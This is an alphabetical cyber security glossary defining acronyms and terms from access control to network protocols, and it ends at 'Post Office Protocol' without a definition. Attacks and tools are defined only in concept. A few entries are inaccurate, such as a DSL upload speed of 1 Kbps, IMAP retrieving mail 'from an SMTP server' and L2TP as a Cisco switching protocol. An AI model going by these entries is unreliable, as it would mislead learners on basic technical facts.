Cyber Security Glossary
Acceptable Use Policy (AUP)
A policy that communicates to users what specific uses of computer resources are permitted.
Access Control List (ACL)
A list associated with an object, such as a file, that identifies what level of access each subject, such as a user, has as well as what they can do to the object, for example, read, write, or execute.
Access Point (AP)
A device designed to interconnct wireless network nodes with wired networks.
Active Directory (AD)
The directory service portion of the Windows operating system that stores information about network-based entities, such as applications, files, printers, and people, and provides a structured, consistent way to name, describe, locate, access, and manage these resources.
Address Resolution Protocol (ARP)
A TCP/IP protocol, used with the command line tool of the same name, to determine the MAC address that corresponds to a particular IP address.
Address Space Layout Randomisation (ASLR)
A memory-protection process employed by operating systems where the memory space is block randomised to guard against targeted injections from buffer-overflow attacks.
Advanced Encryption Standard (AES)
An encryption standard created in the late 1990s, which utilises a symmetric block cipher, that uses a 128-bit block size and either a 128, 192 or 256-bit key size.
Advanced Encryption Standard 256-bit (AES-256)
An implementation of AES using a 256-bit key.
Advanced Persistent Threat (APT)
A threat vector whose main objective is to remain on the system stealthily, with data exfiltration as a secondary task.
Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK)
A framework developed by MITRE for describing the methods used by attackers.
Annualised Loss Expectancy (ALE)
How much an event is expected to cost the business per year.
Annualised Rate of Occurrence (ARO)
The frequency with which an event is expected to occur on an annualised basis.
Antivirus (AV)
A software program designed to detect, mitigate, or remove malware and viruses from a system or network.
Application Programming Interface (API)
A set of instructions as to how to interface with a computer program so that developers can access defined interfaces in a program.
Artificial Intelligence (AI)
Artificial Intelligence, or AI for short, can be described most simply as software that imitates human behaviours and capabilities. This is achieved by utilising an AI model that has been trained on a large amount of data.
Authentication Header (AH)
A portion of the IPSec security protocol that provides authentication services and replay-detection ability. It can be used either by itself or with Encapsulating Security Payload (ESP).
Authentication, Authorisation, Accounting (AAA)
A security philosophy where a user trying to connect to a network must first present some form of credential to be authenticated and then must have limitable permissions within the network. The authenticating server should also record session information about the client.
Authentication, Authorisation, Accounting, Auditing (AAAA)
This adds auditing to the AAA security philosophy.
Automated Indicator Sharing (AIS)
The use of STIX and TAXII to share threat information between systems.
Basic Input/Output System (BIOS)
A firmware element of a computer system that provides the interface between hardware and system software with respect to devices and peripherals. BIOS has been replaced by Unified Extensible Firmware Interface (UEFI), a more complex and capable system.
Border Gateway Protocol (BGP)
An exterior gateway routing protocol that enables groups of routers to share routing information so that efficient, loop-free routes can be established. BGP connects Autonomous Systems on the Internet. The current version is BGP-4.
Bourne Again Shell (BASH)
A command language for Linux systems.
Bridge Protocol Data Unit (BPDU)
A type of data message exchanged across switches within an extended LAN that uses a Spanning Tree Protocol topology.
Bring Your Own Device (BYOD)
Mobile deployment model wherein users bring their own network-enabled devices to the work environment. These mobile phones, tablets, notebooks, and other mobile devices must be easily and securely integrated and released from corporate network environments using onboarding and offboarding technologies.
Business Continuity (BC)
The level of readiness of a business to maintain critical functions after an emergency or discruption.
Business Continuity Planning (BCP)
A plan a business develops to continue critical operations in the event of a major disruption.
Business Email Compromise (BEC)
A type of cyber attack where the attacker uses email to trick a victim in to performing an action that benefits the attacker, such as transferring money or divulging sensitive information.
Business Impact Analysis (BIA)
An analysis of the impact to the business of a specific event.
Business Partners Agreement (BPA)
A written agreement defining the terms and conditions of a business partnership.
Cardholder Data (CHD)
Any personally identifiable information (PII), which is associated with a person who possesses a credit or debit card.
Centre for Internet Security (CIS)
A US based non-profit organization, formed in October 2000. Its mission is to make the connected world a safer place by developing, validating, and promoting timely best practice solutions that help people, businesses, and governments protect themselves against pervasive cyber threats.
Certificate Authority (CA)
An entity responsible for the issuing and revoking of certificates.
Certificate Revocation List (CRL)
A digitally signed object that lists all the current but revoked certificates issued by a given certification authority.
Certificate Signing Request (CSR)
A message sent from an applicant to a certificate authority to apply for a digital identity certificate.
Challenge-Handshake Authentication Protocol (CHAP)
Used to provide authentication across point-to-point links using the Point-to-Point Protocol (PPP).
Channel Service Unit (CSU)
A piece of equipment that connects a T-carrier leased line from the telephone company to a customer’s equipment, such as a router.
Chief Information Officer (CIO)
A company executive responsible for the management, implementation, and usability of information and computer technologies. Also sometimes called Chief Digital Information Officer (CDIO) or Information Technology (IT) Director.
Chief Security Officer (CSO)
The person appointed to oversee security functions in an enterprise.
Chief Technology Officer (CTO)
The person appointed to oversee scientific technology functions in an enterprise.
Choose Your Own Device (CYOD)
A mobile device deployment methodology where each person chooses their own device type.
Cipher Block Chaining (CBC)
A method of adding randomisation to blocks, where each block of plaintext is XORed with the previous ciphertext block before being encrypted.
Cipher Feedback (CFB)
A method to make a block cipher into a self-synchronising stream cipher.
Ciphertext
Ciphertext is the result of plaintext being encrypted using an algorithm, known as a cipher.
Closed-Circuit Television (CCTV)
A private television system usually hardwired into security applications to record visual information.
Cloud Access Security Broker (CASB)
A security policy enforcement mechanism between cloud users and providers.
Cloud Security Alliance (CSA)
A US based not-for-profit organization with a mission to ‘promote the use of best practices for providing security assurance within cloud computing, and to provide education on the uses of cloud computing to help secure all other forms of computing’.
Cloud Service Provider (CSP)
An organisation that offers cloud-based network services, infrastructure, or business applications.
Command and Control (C2)
Servers used by hackers to control malware that has been launched against targets. Multiple machines are often infected with malware and then these machines are used for some malicious purpose, such as stealing sensitive data or launching a distributed denial of service attack.
Common Vulnerabilities and Exposures (CVE [1])
A database hosted by the MITRE corporation, which incorporates a list of known vulnerabilities in publicly released software.
Common Vulnerability Enumeration (CVE [2])
A specification that provides a common language of discourse for discussing, finding, and dealing with the causes of software security vulnerabilities as they are found in code, design, or system architecture.
Common Vulnerability Scoring System (CVSS)
A framework for scoring the severity of a vulnerability.
Common Weakness Enumeration (CWE)
A specification developed and maintained by MITRE to identify the root cause, or weaknesses, of security vulnerabilities.
Common Weakness Scoring System (CWSS)
A specification developed and maintained by MITRE to provide a way to prioritise software weaknesses that can introduce security vulnerabilities.
Completely Automated Public Turing Test to Tell Computers and Humans Apart (CAPTCHA)
Software designed to pose tests that require human ability to resolve, preventing robots from filling in and submitting web pages.
Computer Emergency Response Team (CERT)
A group responsible for investigating and responding to security breaches, viruses, and other potential catastrophic incidents. Also known as a Computer Incident Response Team (CIRT).
Computer Incident Response Team (CIRT)
A group responsible for investigating and responding to security breaches, viruses, and other potential catastrophic incidents. Also known as a Computer Emergency Response Team (CERT).
Computer Security Incident Response Team (CSIRT)
An expert group that handles computer security incidents. Alternative names for such groups include Computer Emergency Readiness Team and Computer Security Incident Response Team. A more modern representation of the CSIRT acronym is Cyber Security Incident Response Team.
Confidentiality, Integrity, and Availability (CIA)
The CIA triad is widely considered to be the foundation of IT security. It is put into practice through various security methods and controls. Every security technique, practice, and mechanism put into place to protect systems and data relates in some fashion to ensuring confidentiality, integrity, and availability.
Content Management System (CMS)
A web based application that allows non-technical users to manage the content of a website. These applications are built using web technologies such as PHP or the .NET Framework and utilise a database, for example, MySQL, PostgreSQL, Oracle or SQL Server, to store the website information.
Contingency Planning (CP)
The act of creating processes and procedures that are used under special conditions.
Continuity of Operations Planning (COOP)
The creation of plans related to continuing essential business operations after any major disruption.
Corporate Owned, Personally Enabled (COPE)
A form of mobile device ownership, or management, where a company provides employees with a mobile device and allows them to use it as if they owned it.
Corrective Action Report (CAR)
A report used to document the corrective actions taken on a system.
Counter-Mode (CTM)
Turns a block cipher into a stream cipher.
Counter-Mode/CBC-MAC Protocol (CCMP)
Also known as Counter Mode with Cipher Block Chaining-Message Authentication Code Protocol. An enhanced data cryptographic encapsulation mechanism based on the Counter Mode with CBC-MAC for AES, designed for use with wireless LANs.
Cross-Site Request Forgery (CSRF or XSRF)
A method of attacking a system by sending malicious input to the system and relying on the parsers and execution elements to perform the requested actions, thus instantiating the attack. CSRF exploits the trust a site has in the user’s browser.
Cross-site Scripting (XSS)
A method of attacking a system by sending script commands to the system input and relying on the parsers and execution elements to perform the requested scripted actions, thus instantiating the attack. XSS exploits the trust a user has for the site.
Cyclic Redundancy Check (CRC)
An error detection technique that uses a series of two 8-bit block check characters to represent an entire block of data. These block check characters are incorporated into the transmission frame and then checked at the receiving end.
Darknet
An area of the internet that cannot be indexed by search engines such as Google and are not normally accessible via a standard web browser, but instead through specialist software. A Darknet can be used for harmless means, such as for a corporate website, as well as illegal means, such as hacking and file sharing forums where users wish to stay anonymous.
Data Encryption Standard (DES)
A private key encryption algorithm adopted by the U.S. government as a standard for the protection of sensitive but unclassified information. Commonly used in 3DES, where three rounds are applied to provide greater security.
Data Execution Prevention (DEP)
A security feature of an operating system that can be driven by software, hardware, or both, designed to prevent the execution of code from blocks of data in memory.
Data Loss Prevention (DLP)
Technology, processes, and procedures designed to detect when unauthorised removal of data from a system occurs. DLP is typically active, preventing the loss either by blocking the transfer or dropping the connection.
Data Privacy Officer (DPO)
The person in charge of privacy/data protection in the EU under GDPR.
Database Administrator (DBA)
A person who is responsible for directing and performing all activities related to maintaining a successful database environment. A DBA makes sure an organisation's databases and related applications operate functionally and efficiently.
Denial-of-Service (DoS)
An attack that floods a networked resource with so many requests that it becomes overwhelmed and ceases functioning. DoS prevents users from gaining normal use of a resource.
Desktop as a Service (DaaS)
A cloud computing service that enables a user or organisation to virtualise user workstations and manage them as flexibly as other cloud resources.
Destination Network Address Translation (DNAT)
A one-to-one static translation from a public destination address to a private address.
Diffie-Hellman Ephemeral (DHE)
A cryptographic method of establishing a shared key over an insecure medium in a secure fashion using a temporary key to enable perfect forward secrecy.
Digital Rights Management (DRM)
Access controls for restricting the use of proprietary hardware and copyrighted works.
Digital Signature Algorithm (DSA)
A U.S. government standard for implementing digital signatures.
Digital Subscriber Line (DSL)
A high-speed Internet connection technology that uses a regular telephone line for connectivity. DSL comes in several varieties, including asymmetric (ADSL) and symmetric (SDSL), and many speeds. Typical home-user DSL connections are ADSL with a download speed of up to 9 Mbps and an upload speed of up to 1 Kbps.
Disaster Recovery (DR)
An organisation’s ability to regain access and functionality to its IT infrastructure after a natural or human disaster.
Disaster Recovery Plan (DRP)
A written plan developed to address how an organisation will react to a natural or manmade disaster in order to ensure business continuity. Related to the concept of a Business Continuity Plan (BCP).
Discretionary Access Control (DAC)
An access control mechanism in which the owner of an object (such as a file) can decide which other subjects (such as other users) may have access to the object as well as what access (read, write, execute) these subjects can have.
Distributed Denial of Service (DDoS)
A multicomputer assault on a network resource that attempts, with sheer overwhelming quantity of requests, to prevent regular users from receiving services from the resource. Can also be used to crash systems. DDoS attacks are usually executed using botnets consisting of compromised systems referred to as zombies.
Domain Keys Identified Mail (DKIM)
An email authentication method designed to detect forged sender addresses in email, a technique often used in phishing and email spam. DKIM allows the receiver to check that an email claiming to have come from a specific domain was indeed authorised by the owner of that domain.
Domain Name System (DNS)
A TCP/IP name resolution system that resolves hostnames to IP addresses, IP addresses to hostname, and other bindings, like DNS servers and mail servers for a domain.
Domain-based Message Authentication Reporting and Conformance (DMARC)
An e-mail authentication, policy, and reporting protocol.
Drive-by Download
A drive-by download is where something is downloaded from the internet to a computer without the prior knowledge of the user, or where a download is authorised by the user but the full consequences of the download are not understood.
Dynamic Host Configuration Protocol (DHCP)
An Internet Engineering Task Force (IETF) Internet Protocol (IP) specification for automatically allocating IP addresses and other configuration information based on network adapter address.
Dynamic Link Library (DLL)
A type of file which contains a library of functions and other information that can be accessed by a Microsoft Windows based piece of software.
Electronic Code Book (ECB)
A block cipher mode where the message is divided into blocks, and each block is encrypted separately.
Electronic Serial Number (ESN)
A unique identification number embedded by manufacturers on a microchip in wireless phones.
Elliptic Curve Cryptography (ECC)
A method of public key cryptography based on the algebraic structure of elliptic curves over finite fields.
Elliptic Curve Diffie-Hellman Ephemeral (ECDHE)
A cryptographic method using ECC to establish a shared key over an insecure medium in a secure fashion using a temporary key to enable perfect forward secrecy.
Elliptic Curve Digital Signature Algorithm (ECDSA)
A cryptographic method using ECC to create a digital signature.
Encapsulated Security Payload (ESP)
A portion of the IPSec implementation that provides for data confidentiality with optional authentication and replay-detection services. ESP completely encapsulates user data in the datagram and can be used either by itself or in conjunction with Authentication Headers for varying degrees of IPSec services.
Encrypted File System (EFS)
A feature on Microsoft Windows introduced in version 3.0 of NTFS, that provides filesystem level encryption. This technology enables files to be transparently encrypted to protect confidential data from attackers with physical access to the computer. It is available on all versions of Windows, except the Home edition, from Windows 2000 onwards. By default, no files are encrypted, but encryption can be enabled by users on a per-file, directory or drive basis.
Encryption
The process of converting plain text into ciphertext to prevent unauthorised access.
End of Life (EOL)
A term used to denote that something has reached the end of its useful life.
End of Service (EOS [1])
A term used to denote when the manufacturer stops selling an item. In most cases, the manufacturer no longer provides maintenance services or updates.
End of Support (EOS [2])
A point in time where a manufacturer stops providing technical support and updates for a product. The product may still function after this time.
End-User License Agreement (EULA)
An agreement that comes with a piece of software, which a user must agree to before using the it. The agreement outlines the terms of use for the software, together with a list of any actions that violate the agreement.
Endpoint Detection and Response (EDR)
A cybersecurity technology that continually monitors an endpoint to mitigate malicious cyber threats. Also known as endpoint threat detection and response.
Enterprise Resource Planning (ERP)
The integrated management of main business processes, often in real time and mediated by software and technology.
Exclusive OR (XOR)
An operation commonly used in cryptography.
Extended Detection Response (XDR)
Collects, correlates, and contextualises alerts from different solutions across endpoints, servers, networks, applications, and cloud workloads, into a unified incident detection and response platform.
Extensible Authentication Protocol (EAP)
Authentication wrapper that EAP-compliant applications can use to accept one of many types of authentication. While EAP is a general-purpose authentication wrapper, its only substantial use is in wireless networks.
Extensible Markup Language (XML)
A text-based, human-readable data markup language.
Facial Recognition Technology (FRT)
Technology that analyses facial features, either from images or video, and compares them to a database of known faces to identify individuals. Distinct points on a face are mapped and assigned a mathematical representation, which is then compared with other mathematical representations assigned to faces in the database.
False Rejection Rate (FRR)
The acceptable level of legitimate users rejected by the system.
Field Programmable Gate Array (FPGA)
A programmable logic circuit instantiation in hardware.
File Integrity Monitoring (FIM)
An internal control or process that performs the act of validating the integrity of operating system and application software files using a verification method between the current file state and a known, good baseline.
File System Access Control List (FACL)
The implementation of access controls as part of a file system.
File Transfer Protocol (FTP)
A protocol that works at the application layer, which is used to transfer files over a network connection. FTP utilises TCP ports 20 and 21.
File Transfer Protocol Secure (FTPS)
A protocol that works at the application layer, which is used to transfer files over a network connection, using FTP over an SSL or TLS connection.
Firewall
A network security system, which monitors traffic to and from a computer network. It has the ability to allow or block traffic depending on a set of predefined rules. Firewalls can be implemented using software, hardware or a combination of the two.
Full Disk Encryption (FDE)
The application of encryption to an entire disk, protecting all the contents in one container.
Galois Counter Mode (GCM)
A mode of operation for symmetric key cryptographic block ciphers that has been widely adopted because it can be parallelised to increase efficiency and performance.
General Data Protection Regulations (GDPR)
European Union law that specifies a broad set of rights and protections for personal information of EU citizens.
Generic Routing Encapsulation (GRE)
A tunnelling protocol developed by Cisco Systems that can encapsulate a wide variety of network layer protocols inside virtual point-to-point links or point-to-multipoint links over an Internet Protocol network.
Global Positioning System (GPS)
A satellite-based form of location services and time standardisation.
GNU Privacy Guard (GPG)
An application program that follows the OpenPGP standard for encryption.
Graphics Processing Unit (GPU)
A chip designed to manage graphics functions in a system.
Group Policy Object (GPO)
A method used by Windows for the application of OS settings enterprise-wide.
Hard Disk Drive (HDD)
A mechanical device used for the storing of digital data in magnetic form.
Hardware Security Module (HSM)
A physical device used to protect but still allow the use of cryptographic keys. It is separate from the host machine.
Hashed Message Authentication Code (HMAC)
The use of a cryptographic hash function and a message authentication code to ensure the integrity and authenticity of a message.
Heating, Ventilation, and Air Conditioning (HVAC)
All the equipment involved in heating and cooling the environment within a facility. This includes boilers, furnaces, air conditioning units and ducts, plenums, and air passages.
High Availability (HA)
A collection of technologies and procedures that work together to keep an application available at all times.
HMAC-based One-time Password (HOTP)
A method of producing one-time passwords using HMAC functions.
Honeypot
A computer system or portion of a network that has been set up purely for the purposes of attracting intruders. As there are no legitimate users in a system such as this, unauthorised activity is easy to spot.
Host-based Intrusion Detection System (HIDS)
A system that looks for computer intrusions by monitoring activity on one or more individual PCs or servers.
Host-based Intrusion Prevention System (HIPS)
A system that automatically responds to computer intrusions by monitoring activity on one or more individual PCs or servers and responding based on a rule set.
Hypertext Markup Language (HTML)
A language that is used to provide the structure of web pages, using tags to define different parts of the page structure, for example, <h1> tags to denote the largest headings, or <p> tags for paragraphs of text.
Hypertext Transfer Protocol (HTTP)
A network protocol that facilitates the transfer of documents, such as web pages, on the web, typically between a web browser and a server.
Hypertext Transfer Protocol Secure (HTTPS)
A secure version of HTTP in which hypertext is encrypted by Transport Layer Security (TLS) before being sent over the network. Prior to TLS, this was accomplished using Secure Sockets Layer (SSL).
Identity and Access Management (IAM)
The policies and procedures used to manage access control.
Identity Provider (IdP)
A system that creates, maintains, and manages identity information, including authentication services.
Incident Response (IR)
The process of responding to, containing, analysing, and recovering from a computer-related incident.
Incident Response Plan (IRP)
The plan used in responding to, containing, analysing, and recovering from a computer related incident.
Indicators of Compromise (IoC)
A set of values that, if found in memory or file storage, indicate a specific compromise event.
Industrial Control System (ICS)
System that monitors and controls machines such as those in a factory or chemical plant, or even just a large HVAC system in an office building.
Information Systems Security Officer (ISSO)
An individual with assigned responsibility for maintaining the appropriate operational security posture for an information system or program.
Infrastructure as a Service (IaaS)
Cloud Service model that provides on-demand access to infrastructure such as servers, switches, and routers at rates based on resource use. Large-scale, global IaaS providers use virtualisation to minimise idle hardware, protect against data loss and downtime, and respond to spikes in demand.
Infrastructure as Code (IaC)
The use of machine-readable definition files as well as code to manage and provision computer systems.
Initialisation Vector (IV)
A data value used to seed a cryptographic algorithm, providing for a measure of randomness.
Instant Messaging (IM)
A text-based method of communicating over the Internet.
Institute of Electrical and Electronic Engineers (IEEE)
A non-profit, technical, professional institute associated with computer research, standards, and conferences.
Interconnection Security Agreement (ISA)
An agreement between parties to establish procedures for mutual cooperation and coordination between them with respect to security requirements associated with their joint project.
Intermediate Distribution Frame (IDF)
The room where all the horizontal runs from all the work areas on a given floor in a building come together.
International Data Encryption Algorithm (IDEA)
A symmetric encryption algorithm used in a variety of systems for bulk encryption services.
International Standards Organisation (ISO)
An international standard development organisation composed of representatives from the national standards organisations of member countries.
Internet Control Message Protocol (ICMP)
A TCP/IP protocol used to handle many low-level functions such as error or informational reporting. ICMP messages are usually request and response pairs such as echo requests and responses or router solicitations and responses. There are also unsolicited 'responses' (advertisements) that consist of single packets. ICMP messages are connectionless.
Internet Key Exchange (IKE)
A standard key exchange protocol used on the Internet, which is an implementation of the Diffie-Hellmann algorithm.
Internet Message Access Protocol (IMAP)
Protocol for retrieving e-mail from an SMTP server.
Internet of Things (IoT)
The everyday objects that can communicate with each other over the Internet, such as smart home appliances, automobiles, video surveillance systems, and more.
Internet Protocol (IP)
Layer 3 protocol responsible for logical addressing and routing packets across networks, including the Internet. It doesn't guarantee reliable delivery of packets across the network, leaving that task to higher-level protocols.
Internet Protocol Security (IPSec)
A protocol used to secure IP packets during transmission across a network. IPSec offers authentication, integrity, and confidentiality services. It uses Authentication Header (AH) and Encapsulating Security Payload (ESP) to accomplish this.
Internet Protocol version 4 (IPv4)
First version of the Internet Protocol introduced in 1980. IPv4 consists of a protocol, header, and address specification. Its 32-bit addresses are written as four sets of numbers between 0 and 255 separated by a period (often called dotted decimal notation).
Internet Protocol version 6 (IPv6)
Second version of the Internet Protocol developed as the address-space limitations of IPv4 became clear. While standardisation started in the 1990s, the transition from IPv4 to IPv6 is still ongoing. Its 128-bit addresses consist of eight sets of four hexadecimal numbers, with each number between 0000 and ffff, using a colon to separate the numbers.
Internet Relay Chat (IRC)
An application layer protocol that facilitates communication in the form of text across the Internet.
Internet Service Provider (ISP)
An organisation that provides access to the Internet in some form, usually for a fee.
Intrusion Detection System (IDS)
A system that monitors network traffic for suspicious activity and alerts when such activity is discovered.
Intrusion Prevention System (IPS [1])
A network security/threat prevention technology that examines network traffic flows to detect and prevent vulnerability exploits. Vulnerability exploits usually come in the form of malicious inputs to a target application or service that attackers use to interrupt and gain control of an application or machine.
IT Contingency Plan (ITCP)
The plan used to manage contingency operations in an IT environment.
Kerberos
A network authentication protocol developed by MIT to enable multiple brands of servers to authenticate multiple brands of clients.
Key Distribution Centre (KDC)
A component of the Kerberos system for authentication that manages the secure distribution of keys.
Key Encryption Key (KEK)
An encryption key whose function it is to encrypt and decrypt the data encryption key (DEK).
Layer 2 Tunnelling Protocol (L2TP)
A Cisco switching protocol that operates at the data link layer.
Lightweight Directory Access Protocol (LDAP)
An application protocol used to access directory services across a TCP/IP network.
Lightweight Extensible Authentication Protocol (LEAP)
A version of EAP developed by Cisco prior to 802.11i to push 802.1X and WEP adoption.
Local Area Network (LAN)
Network that generally (but not always) belongs to one household or organisation and covers a limited area (anything from two devices in an apartment up to thousands of devices on a multi-building school or business campus).
Machine Learning (ML)
Machine learning, or ML for short, is a subfield of artificial intelligence that enables computers to learn patterns from data and make decisions or predictions without being explicitly programmed.
Mail Exchange (MX)
A DNS record that SMTP servers use to determine where to send mail for a given domain.
Main Distribution Frame (MDF)
The room in a building that stores the demarc, telephone cross-connects, and LAN cross-connects.
Malware
Malware is the collective name given to software that has been developed to disrupt or damage data, software or hardware, as well as gain unauthorised access to computer systems.
Managed Detection and Response (MDR)
A cyber security service provided by a third-party that combines advanced technology with human expertise to monitor an organisation's networks, endpoints, and cloud environments for threats, as well as to respond to any threats that are encountered.
Managed Security Service Provider (MSSP)
A third party that manages the security aspects of a system under some form of service agreement.
Managed Service Provider (MSP)
A third party that manages aspects of a system under some form of service agreement.
Mandatory Access Control (MAC [1])
An authorisation method in which the system grants access to resources based on security labels and clearance levels. Used in organisations with very high security needs.
Master Boot Record (MBR)
A strip of data on a hard drive in Windows systems meant to result in specific initial functions or identification.
Master Service Agreement (MSA [2])
A contract between two or more parties that establishes what terms and conditions will govern all current and future activities and responsibilities. It creates a contract framework that provides the foundation for all future actions.
Maximum Transmission Unit (MTU)
A measure of the largest payload that a particular protocol can carry in a single packet in a specific instance.
Mean Time Between Failure (MTBF)
A factor typically applied to a hardware component that represents the manufacturer’s best guess (based on historical data) regarding how much time will pass between major failures of that component.
Mean Time to Detect (MTTD)
The average time passed between the onset of an IT incident and its discovery, measured by dividing the sum of incident detection times by the number of incidents.
Mean Time to Failure (MTTF)
The statistically determined time to the next failure.
Mean Time to Repair/Recover (MTTR)
A common measure of how long it takes to repair a given failure. This is the average time and may or may not include the time needed to obtain parts.
Media Access Control (MAC [2])
A protocol used in the data link layer for local network addressing.
Memorandum of Agreement (MOA)
A document executed between two parties that defines some form of agreement.
Memorandum of Understanding (MOU)
A document that defines an agreement between two parties in situations where a legal contract is not appropriate.
Message Authentication Code (MAC [4])
A short piece of data used to authenticate a message. This is often a hashed message authentication code (HMAC), where a hash function is used on the message authentication code to ensure the integrity and authenticity of a message.
Message Digest 5 (MD5)
A hashing algorithm and a specific method of producing a message digest.
Metasploit Framework (MSF)
A modular penetration testing framework, written in Ruby, that contains a suite of tools that can be used to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. It enables the user to write, test, and execute, exploit code.
Metropolitan Area Network (MAN)
Multiple computers connected via cabling, radio, leased phone lines, or infrared that are within the same city.
Microsoft Challenge Handshake Authentication Protocol (MSCHAP)
A Microsoft Developed variant of the Challenge Handshake Authentication Protocol (CHAP).
Mobile Application Management (MAM)
The software and services responsible for provisioning and controlling access to internally developed and commercially available mobile apps used in business settings, on both company-provided and 'bring your own' mobile operating systems as used on smartphones and tablet computers.
Mobile Device Management (MDM)
An application designed to bring enterprise-level functionality onto a mobile device, including security functionality and data segregation.
Monitoring as a Service (MaaS)
The use of a third party to provide security monitoring services.
Multifactor Authentication (MFA)
The use of more than one different factor for authenticating a user to a system.
Multifunction Device (MFD)
A single device that consolidates the functions of multiple document handling devices, such as printing, copying, scanning, and faxing.
Multifunction Printer (MFP)
An office machine which incorporates the functionality of multiple devices in one, so as to have a smaller footprint in a home or small business setting, or to provide centralised document management, distribution, or production in a large-office setting. Also known as an all-in-one device or multifunction device.
Multimedia Message Service (MMS)
A standard way to send multimedia messages to and from mobile phones over a cellular network.
Multiprotocol Label Switching (MPLS)
A routing technique in telecommunications networks that directs data from one node to the next based on labels rather than network addresses. Whereas network addresses identify endpoints the labels identify established paths between endpoints. MPLS can encapsulate packets of various network protocols, hence the multiprotocol component of the name.
Name Server (NS)
DNS servers that hold the actual name and IP DNS records in a kind of database called a zone.
National Institute of Standards & Technology (NIST)
A U.S. government agency responsible for standards and technology.
Near Field Communication (NFC)
A set of standards and protocols for establishing a communication link over very short distances, which are used with mobile devices.
Network Access Control (NAC)
An approach to endpoint security that involves monitoring and remediating end-point security issues before allowing an object to connect to a network.
Network Address Translation (NAT)
A way of converting a system's IP address into another IP address before sending it out to a larger network. A network using NAT provides the systems on the network with private IP addresses. The system running the NAT software has two interfaces, one connected to the network and the other connected to the larger network. The NAT program takes packets from the client systems bound for the larger network and translates their internal private IP address to its own public IP address, enabling many systems to share an IP address.
Network Time Protocol (NTP)
A protocol for the transmission of time synchronisation packets over a network.
Network Time Security (NTS)
A protocol developed to secure communications between clients and time servers of the Network Time Protocol (NTP).
Network-based Intrusion Detection System (NIDS)
A system for examining network traffic to identify suspicious, malicious, or undesirable behaviour.
Network-based Intrusion Prevention System (NIPS)
A system that examines network traffic and automatically responds to computer intrusions.
New Technology File System (NTFS)
A proprietary file system developed by Microsoft, introduced in 1993, that supports a wide variety of file operations on servers, PCs, and media.
New Technology LAN Manager (NTLM)
A deprecated security suite from Microsoft that provides authentication, integrity, and confidentiality for users. As it does not support current cryptographic methods, it is no longer recommended for use.
Next-Generation Firewall (NGFW)
Network protection device that functions at multiple layers of the OSI model to tackle traffic no traditional firewall can filter alone.
Non-Disclosure Agreement (NDA)
A legally binding contract that establishes a confidential relationship. The party or parties signing the agreement agree that sensitive information they may obtain will not be made available to any others. An NDA may also be referred to as a confidentiality agreement.
Object Identifier (OID)
The Simple Network Management Protocol (SNMP) uses Management Information Bases (MIBs) to categorise data that can be queried, and subsequently analysed. Object Identifiers uniquely number data pieces within a MIB.
On-The-Go (OTG)
In relation to USB, it refers to a standardised specification that allows a device to read data from a USB device without requiring a PC.
One-Time Password (or Passcode) (OTP)
A unique, dynamically generated, temporary code, that is used for authentication and is only valid for one login session or transaction.
Online Certificate Status Protocol (OCSP)
A protocol used to request the revocation status of a digital certificate. This is an alternative to certificate revocation lists.
Open Authorization (OAUTH)
An open protocol that allows secure, token-based authorisation on the Internet from web, mobile, and desktop applications via a simple and standard method. It can be used by an external partner site to allow access to protected data without having to re-authenticate the user. It was created to remove the need for users to share their passwords with third-party applications, by substituting it with a token.
Open Shortest Path First (OSPF)
An interior gateway routing protocol developed for IP networks based on the shortest path first or link state algorithm.
Open Source
Software that is said to be open source refers to the fact that the original source code used to create it is made freely available to view, modify, enhance and redistribute.
Open Source Security Testing Methodology Manual (OSSTMM)
A peer-reviewed methodology for security testing, maintained by the Institute for Security and Open Methodologies (ISECOM).
Open Vulnerability Assessment Language (OVAL)
An XML-based standard for the communication of security information between tools and services.
Open Vulnerability Assessment Scanner (OpenVAS)
An open-source vulnerability scanner that can detect security issues in all manner of servers and network devices.
Open-source Intelligence (OSINT)
Security information derived from sources available to the public.
Operating System (OS)
The basic software that handles input, output, display, memory management, and all the other highly detailed tasks required to support the user environment and associated applications.
Operational Technology (OT)
The name for an IT system used in an industrial setting to control physical processes.
Over The Air (OTA)
Refers to performing an action wirelessly.
Packet Capture (PCAP)
The methods and files associated with the capture of network traffic in the form of text files.
Pan-Tilt-Zoom (PTZ)
A term used to describe a video camera that supports remote directional and zoom control.
Password Authentication Protocol (PAP)
A simple protocol used to authenticate a user to a network access server.
Password-based Key Derivation Function 2 (PBKDF2)
A key derivation function that is part of the RSA Laboratories Public Key Cryptography Standards, published as IETF RFC 2898.
Payment Card Industry Data Security Standard (PCI DSS)
A contractual data security standard initiated by the credit card industry to cover cardholder data.
Peer to Peer (P2P)
A network connection methodology involving direct connection from peer to peer.
Perfect Forward Secrecy (PFS)
A property of a cryptographic system whereby the loss of one key does not compromise material encrypted before or after its use.
Personal Health Information (PHI)
Information related to a person’s medical records, including financial, identification, and medical data.
Personal Identification Number (PIN)
A number that is secret, known only to the user to establish identity.
Personal Identity Verification (PIV)
Policies, procedures, hardware, and software used to securely identify federal workers.
Personally Identifiable Information (PII)
Information that can be used to identify a single person.
Phishing
An attempt to gain sensitive information, such as user account and bank details, for malicious reasons, via an electronic communication, such as email, purporting to be from a trustworthy source. This might be to steal someone’s identity, for financial gain, or both.
PKCS #12 (P12)
A commonly used member of the family of standards called Public-Key Cryptographic Standards (PKCS), published by RSA Laboratories.
Plain Old Telephone Service (POTS)
The term used to describe the old analogue phone service and later the ‘land-line’ digital phone service.
Platform as a Service (PaaS)
A cloud service model which provides a managed environment of hardware and software. This type of service is popular with application developers as it removes the need to maintain the complex infrastructure required.
Pluggable Authentication Modules (PAM [2])
A mechanism used in Linux systems to integrate low-level authentication methods into an API.
Point-to-Point Protocol (PPP)
The Internet standard for transmission of IP packets over a serial line, as in a dial-up connection to an ISP.
Point-to-Point Tunnelling Protocol (PPTP)
The use of generic routing encapsulation over PPP to create a methodology used for virtual private networks.
Pointer (PTR)
A type of DNS record that points IP addresses to hostnames.
Port
In Computing there are two types of port, hardware ports and networking ports. A hardware port serves as an interface between a computer and peripheral devices, such as a monitor, printer, keyboard, and mouse. A port is a part of a computer that these devices connect to. A networking port is a communication endpoint. It is a logical construct that identifies a specific process or type of network service, at the software level, within an operating system. Ports have a port number associated with them and relate to specific transport protocols, for example, port 80 handles HTTP traffic.
Port Address Translation (PAT)
The most used form of network address translation, where the NAT uses the outgoing IP addresses and port numbers (collectively known as a socket) to map traffic from specific machines in the network.
Portable Electronic Device (PED)
A term used to describe an electronic device, owned by the user, and brought into the enterprise, that uses enterprise data. This includes laptops, tablets, and mobile phones, to name a few.
Post Office Protocol (POP)
